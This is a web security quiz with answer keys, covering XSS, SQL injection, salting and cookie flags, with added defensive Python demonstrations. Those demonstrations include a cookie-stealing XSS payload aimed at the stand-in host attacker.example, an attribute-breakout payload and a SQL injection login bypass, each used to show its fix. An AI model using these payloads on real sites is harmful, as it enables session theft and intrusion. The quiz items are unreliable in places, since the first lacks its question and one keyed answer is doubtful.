Web Security Quiz

Description: This quiz is about web security; it contains questions on Cross Site Scripting (XSS) and security best practices.
Number of Questions: 20
Created by:
Tags: security
  1. Hidden tags

  2. Query Strings

  3. Header

  4. Cookies

Correct Option: B

How can we prevent dictionary attacks on password hashes?

  1. Hashing the password twice

  2. Encrypting the password using the private key

  3. Use an encryption algorithm you wrote yourself so no one knows how it works

  4. Salting the hash

Correct Option: D
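Why option D is the answer, as an added example (Python, not part of the original quiz): an attacker who precomputes the hash of every word in a dictionary can crack any unsalted digest with a lookup and reuse that table against every user, while a per-user random salt forces the work to be redone for each stolen record. The wordlist, the password "hunter2" and the 16-byte salts are constructed for the demonstration, and plain SHA-256 stands in for the slow KDF (bcrypt, scrypt, Argon2) a real system would use.

```python
import hashlib
import os

# Constructed stand-in for an attacker's wordlist (assumption: real dictionaries
# hold millions of entries, but the mechanics are identical).
DICTIONARY = ["password", "letmein", "qwerty", "hunter2", "correcthorse"]


def unsalted_hash(password: str) -> str:
    """Weak scheme: bare SHA-256, so equal passwords give equal digests for all users."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: bytes) -> str:
    """Per-user random salt prepended before hashing; the salt is stored next to
    the digest.  A production scheme would also use a slow KDF so every guess
    costs the attacker time; SHA-256 is used here only to keep the demo short."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def precompute_table(words):
    """Attacker's one-off work against the unsalted scheme: digest -> password."""
    return {unsalted_hash(w): w for w in words}


def table_lookup(table, stolen_digest):
    """Cracking an unsalted digest is a dictionary lookup, reusable across users."""
    return table.get(stolen_digest)


def per_user_guess(words, stolen_digest, salt):
    """Against a salted digest the attacker must redo the hashing for each salt;
    returns (password or None, number of hashes computed)."""
    for i, w in enumerate(words, start=1):
        if salted_hash(w, salt) == stolen_digest:
            return w, i
    return None, len(words)


def demo():
    table = precompute_table(DICTIONARY)
    # Two users chose the same weak password.
    unsalted = [unsalted_hash("hunter2"), unsalted_hash("hunter2")]
    salts = [os.urandom(16), os.urandom(16)]
    salted = [salted_hash("hunter2", s) for s in salts]
    return {
        "unsalted_identical": unsalted[0] == unsalted[1],
        "unsalted_cracked": [table_lookup(table, d) for d in unsalted],
        "salted_identical": salted[0] == salted[1],
        "salted_table_lookup": [table_lookup(table, d) for d in salted],
        "salted_per_user": [per_user_guess(DICTIONARY, d, s)
                            for d, s in zip(salted, salts)],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Note the caveat in the last result: the salt defeats the precomputed table, but a weak password is still found by rehashing the dictionary against that one user's salt, which is why the salt is paired with a slow KDF and a password policy rather than relied on alone.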

Implementing access control based on a hard-coded IP address

  1. Can be done as it is an internal IP

  2. Can be done for internet facing servers as there are no chances of IP conflicts

  3. Is a good security practice

  4. Is a bad security practice

Correct Option: D

Temporary files

  1. Should be placed securely in a folder called “temp” in the web root

  2. Can be placed anywhere in the web root as long as there are no links to them

  3. Should be completely removed from the server

  4. Can be placed anywhere after changing the extension

Correct Option: C

What is the preferred medium for backing up log files?

  1. Print the logs to a paper

  2. Create a copy of data in your laptop/desktop

  3. Copy the files to CD-Rs

  4. None of the above

Correct Option: C

What is the common cause of buffer overflows, cross-site scripting, SQL injection and format string attacks?

  1. Unvalidated input

  2. Lack of authentication

  3. Improper error handling

  4. Insecure configuration management

Correct Option: A

Which of the following can be considered a possible solution for a SQL injection vulnerability?

  1. Data Validation

  2. Secure Cookies

  3. Encryption

  4. Comprehensive exception handling

Correct Option: A

Which of the following is appropriate for customer emails regarding a limited time promotional offer?

  1. Request that the user authenticate him/herself by replying to the email with their account credentials.

  2. Personalized greeting line

  3. Providing easy access to the customer's account via a “Click Here” style link

  4. Sending the email from a domain set up specifically for the special offer

Correct Option: B

Cross Site Scripting is an attack against

  1. Client (Browser)

  2. Database

  3. Web Application

  4. Web Server

Correct Option: A

Which cookie flag, when set, prevents the cookie's transmission over a non-secure channel?

  1. Secure

  2. Domain

  3. Expires

  4. Static

Correct Option: A

The main risk to a web application in a cross site scripting attack is …

  1. Compromise of users

  2. Loss of data integrity

  3. Destruction of data

  4. None of the above

Correct Option: A

Which of the following can be considered user input for which validation is not required?

  1. Host Header

  2. Cookie

  3. Referrer Header

  4. None of the above

Correct Option: D

Which languages are vulnerable to Cross Site Scripting attacks?

  1. Java

  2. ASP.Net

  3. Perl

  4. All of the above

Correct Option: D

What does "White List" data validation mean?

  1. Data is validated against a list of values that are known to be valid

  2. Data is validated against a list of values that are known to be invalid

  3. Both of the above

  4. None of the above

Correct Option: A
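The SQL injection question and the white-list question above are two halves of one defence, shown here as an added example (Python with the standard sqlite3 module, not part of the original quiz): an allow-list that accepts only usernames of a known-good shape, and a parameterized query that keeps user input out of the SQL text entirely. The users table, its rows and the attacker string "alice' --" are constructed; passwords are stored in clear only to keep the demonstration short.

```python
import re
import sqlite3

# Allow-list for a username: a lowercase letter, then 2-31 letters, digits or
# underscores.  Anything outside this shape is rejected, not "cleaned up".
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")


def is_valid_username(value: str) -> bool:
    """Allow-list ("white list") validation: true only for known-good shapes."""
    return USERNAME_RE.fullmatch(value) is not None


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed rows (clear-text passwords for brevity;
    a real table holds salted hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """User input is pasted into the SQL text, so a quote in it becomes syntax.
    With username "alice' --" the password comparison is commented out."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Bound parameters: the driver sends values separately from the query text,
    so a quote in the input is just a character inside the value."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Defence in depth: allow-list the identifier, then bind the parameters."""
    if not is_valid_username(username):
        return None
    return login_parameterized(conn, username, password)


# Constructed attacker input: closes the string and comments out the rest.
INJECTION = "alice' --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, INJECTION, "wrong"))
    print("parameterized:", login_parameterized(db, INJECTION, "wrong"))
    print("safe:", login_safe(db, INJECTION, "wrong"))
```

The parameterized query alone already stops the injection; the allow-list is still worth keeping because it rejects malformed input before it reaches any later consumer (logs, templates, other queries) that might not be parameterized.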

Failing to properly validate uploaded files could result in:

  1. Arbitrary code execution

  2. Inadequate caching headers

  3. Distributed Denial of Service Attack against clients

  4. None of the above

Correct Option: A

In which of the following exploits does an attacker insert malicious code into a link that appears to be from a trustworthy source?

  1. Cross-Site Scripting

  2. Buffer overflows

  3. Command injection

  4. Path traversal attack

Correct Option: A
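The reflected XSS described in this question and in the earlier "Cross Site Scripting is an attack against" question, as an added example (Python, not part of the original quiz): a link that really does point at the legitimate site carries script in its q parameter, the vulnerable page reflects it into the HTML and the victim's browser runs it, while HTML-entity encoding at the output point renders it as text. The hostnames shop.example and attacker.example, the search page markup and both payloads are constructed; the second payload shows why the encoder must also handle quotes, since it breaks out of an attribute without any < character.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link: the host is the real site, but q carries a script
# that sends the victim's cookie to attacker.example.
CRAFTED_LINK = (
    "https://shop.example/search?q="
    "%3Cscript%3Elocation%3D%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)

# Constructed payload for the attribute context: closes value="..." and adds an
# event handler, so an encoder that only handles < and > would miss it.
ATTR_LINK = ("https://shop.example/search?q="
             "x%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22")


def query_param(url: str, name: str) -> str:
    """Extract one query parameter; parse_qs percent-decodes it for us."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def search_page_vulnerable(url: str) -> str:
    """Reflects the search term into the page verbatim (text and attribute)."""
    q = query_param(url, "q")
    return f'<h1>Results for {q}</h1><input name="q" value="{q}">'


def search_page_safe(url: str) -> str:
    """Same page with entity encoding at the output point.  quote=True also
    encodes " and ', which is what makes the attribute context safe."""
    q = html.escape(query_param(url, "q"), quote=True)
    return f'<h1>Results for {q}</h1><input name="q" value="{q}">'


def has_script_tag(page: str) -> bool:
    """Coarse check for the demo: does the markup contain a live <script> tag?"""
    return "<script" in page.lower()


def breaks_out_of_attribute(page: str) -> bool:
    """Coarse check for the demo: did the payload land as a real attribute?"""
    return ' onfocus="' in page


if __name__ == "__main__":
    print(search_page_vulnerable(CRAFTED_LINK))
    print(search_page_safe(CRAFTED_LINK))
    print(search_page_vulnerable(ATTR_LINK))
    print(search_page_safe(ATTR_LINK))
```

The server, the language and the database are untouched in this attack; the damage is done in the victim's browser, which is why the quiz counts XSS as an attack on the client and why the fix is output encoding chosen for the context (HTML body, attribute, URL, JavaScript) rather than a language switch.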

Which of the following should be stored in a cookie?

  1. Session ID

  2. Account Privileges

  3. UserName

  4. Password

Correct Option: A
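The cookie questions above (the Secure flag, and what belongs in the cookie) combined into one added example (Python 3.8+ standard library, not part of the original quiz): the cookie carries only a random session id, the username and privileges live in a server-side store the client cannot edit, and the Set-Cookie value is emitted with Secure, HttpOnly and SameSite. The in-memory SESSIONS dict stands in for a real session store, and the missing_session_flags helper is a small audit function written for this example.

```python
import secrets
from http.cookies import SimpleCookie

# Server-side session store (assumption: a dict standing in for Redis or a DB).
# The cookie carries only the opaque session id; username and privileges live
# here, where the client cannot rewrite them.
SESSIONS = {}


def create_session(username: str, role: str) -> str:
    """Mint a session id with 256 bits from the OS CSPRNG and record the
    principal and role against it server-side."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "role": role}
    return sid


def session_cookie_header(sid: str) -> str:
    """Set-Cookie value for the session id with the flags a session cookie needs:
    Secure (never sent over plain HTTP), HttpOnly (not readable by page script,
    which blunts cookie theft via XSS) and SameSite (limits cross-site sending)."""
    c = SimpleCookie()
    c["sid"] = sid
    c["sid"]["secure"] = True
    c["sid"]["httponly"] = True
    c["sid"]["samesite"] = "Strict"
    c["sid"]["path"] = "/"
    return c["sid"].OutputString()


def missing_session_flags(cookie_header_value: str):
    """Audit helper: parse a Set-Cookie value and list the protective flags
    it lacks (empty list means all three are present)."""
    c = SimpleCookie()
    c.load(cookie_header_value)
    missing = []
    for morsel in c.values():
        if not morsel["secure"]:
            missing.append("Secure")
        if not morsel["httponly"]:
            missing.append("HttpOnly")
        if not morsel["samesite"]:
            missing.append("SameSite")
    return missing


def role_for(sid: str):
    """Authorisation looks privileges up server-side; a forged or unknown id
    yields nothing, and there is no role cookie for the client to edit."""
    session = SESSIONS.get(sid)
    return session["role"] if session else None


if __name__ == "__main__":
    sid = create_session("alice", "user")
    header = session_cookie_header(sid)
    print("Set-Cookie:", header)
    print("missing:", missing_session_flags(header))
    print("missing:", missing_session_flags("sid=abc123; Path=/"))
    print("role:", role_for(sid), role_for("forged"))
```

Storing the role in the cookie would let anyone who can edit their cookie jar promote themselves; storing the password there would hand it to every script or proxy that can read the cookie. The session id is the only value that needs to travel, and the flags above decide where it may travel.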

What should be considered most when doing data classification?

  1. The type of users who would be accessing the data

  2. Availability, Integrity and Confidentiality

  3. The threat level the company faces

  4. Access controls protecting the data

Correct Option: B

What are the fundamental principles of Security?

  1. Availability, Integrity, Confidentiality

  2. Usability, Reliability, Accountability

  3. Quality, Accountability, Integrity

  4. None of the above

Correct Option: A